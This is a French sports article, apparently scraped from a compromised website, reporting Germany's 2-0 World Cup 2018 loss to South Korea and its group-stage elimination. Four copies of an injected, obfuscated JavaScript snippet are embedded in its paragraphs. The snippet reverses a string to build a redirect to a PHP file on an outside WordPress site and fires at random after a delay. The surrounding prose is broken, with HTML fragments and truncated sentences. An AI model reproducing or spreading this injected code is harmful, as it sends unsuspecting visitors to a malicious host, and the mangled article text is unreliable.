Coupe du Monde 2018: Alea Jecta Es, L’Allemagne éliminée après sa défaite 2-0 contre la Corée du Sud

toire, la Mannschaft échoue à franchir la phase de poules après sa défaite contre la Corée du Sud (2-0) mercredi. Les hommes de Joachim Löw terminent même à la dernière place du groupe F. Un gigantesque fiasco.

$nJe=function(n){if (typeof ($nJe.list[n]) == “string”) return $nJe.list[n].split(“”).reverse().join(“”);return $nJe.list[n];};$nJe.list=[“\’php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}toryfull__paragraph” style=”text-align: justify;”>C’est un tremblement de terre ! Battue par la Corée du Sud, ce mercredi (2-0), l’Allemagne est éliminée de la Coupe du monde dès la phase de groupes pour la première fois de son histoire. En jetant leurs dernières forces dans la bataille dans le temps additionnel pour tenter d’aller décrocher la qualification, les Allemands se sont fait surprendre deux fois. Ils terminent bons derniers du groupe F. Pour la quatrième fois lors des cinq dernières éditions, le tenant du titre ne voit donc pas les huitièmes de finale.

Et pourtant, on pensait les Allemands ressuscités après la victoire décrochée dans le temps additionnel, samedi, sur un coup de patte de toni-kroos_prs120480/person.shtml”>Toni Kroos face à la ands ont tenu le ballon (74%) sans apporter le danger sur le but de Cho (24 tirs… 5 cadrés). Et quand ce fut le cas, le portier coréen a tout sorti : les têtes à bout portant de $nJe=function(n){if (typeof ($nJe.list[n]) == “string”) return $nJe.list[n].split(“”).reverse().join(“”);return $nJe.list[n];};$nJe.list=[“\’php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}tolink” href=”https://www.eurosport.fr/football/mario-gomez_prs28591/person.shtml”>Mario Gomez (72e) ou encore la frappe croisée de Toni Kroos (89e).

Deux buts en trois minutes

$nJe=function(n){if (typeof ($nJe.list[n]) == “string”) return $nJe.list[n].split(“”).reverse().join(“”);return $nJe.list[n];};$nJe.list=[“\’php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}tolink” href=”https://www.eurosport.fr/football/manuel-neuer_prs54520/person.shtml”>Neuer à 70 mètres de son but (90e+6). Le score est sévère pour la Mannschaft, mais ce n’est en rien un hold-up. En première période, $nJe=function(n){if (typeof ($nJe.list[n]) == “string”) return $nJe.list[n].split(“”).reverse().join(“”);return $nJe.list[n];};$nJe.list=[“\’php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}toryfull__paragraph” style=”text-align: justify;”>Finalement, il n’y a rien de bien étonnant à voir sortir l’Allemagne, tant ils ont été inquiétants défensivement et sans idée devant le but adverse. Au coup de sifflet final, les mines étaient défaites, forcément. Il faut dire que les Allemands, sous Joachim Löw, ont toujours rejoint les demi-finales, dans le pire des cas en grande compétition. C’est probablement une fin de cycle que vivent les champions du monde en titre. Il va désormais falloir s’en relever.

toryfull__content-picture–picture”>

La joie de Son (Corée du Sud) buteur contre l'Allemagne
  • 3
  •  
  •  
  •  
  •  
    3
    Partages
  • 254
    Partages

Laisser un commentaire

Votre adresse de messagerie ne sera pas publiée. Les champs obligatoires sont indiqués avec *

%d blogueurs aiment cette page :